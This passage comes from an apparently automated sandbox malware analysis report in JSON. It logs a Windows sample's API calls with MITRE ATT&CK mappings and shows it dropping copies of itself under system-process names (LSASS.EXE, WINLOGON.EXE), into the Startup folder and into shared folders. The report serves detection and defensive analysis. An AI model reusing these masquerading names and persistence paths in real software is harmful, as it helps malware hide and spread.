\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1624\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"380107c6\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"380107c6\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"380107c6\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"380107c6\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"380107c6\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"380107c6\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"22010795\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"22010795\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"380107c6\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"22010795\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"22010795\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"22010795\"\n \"cx\": \"32\"\n \"cy\": \"32\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter D3_08.exe (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00005080)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"D3_08.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"\\Device\\KsecDD\"\n \"D3_08.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"\n \"SMSS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46707 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46885 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46830 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46798 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46900 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46670 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46922 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46863 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46826 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46844 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46831 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46803 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46866 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46930 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46919 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46950 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46900 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46658 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46897 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46860 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46913 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46782 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46901 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46768 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46899 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46942 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46762 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46881 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46886 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46789 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" wrote 46948 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\D3_08\\New Folder.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\Data HAPUBWS.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46791 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46791 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46814 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46773 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46810 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46793 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46814 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46853 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46772 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46874 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46781 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46864 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 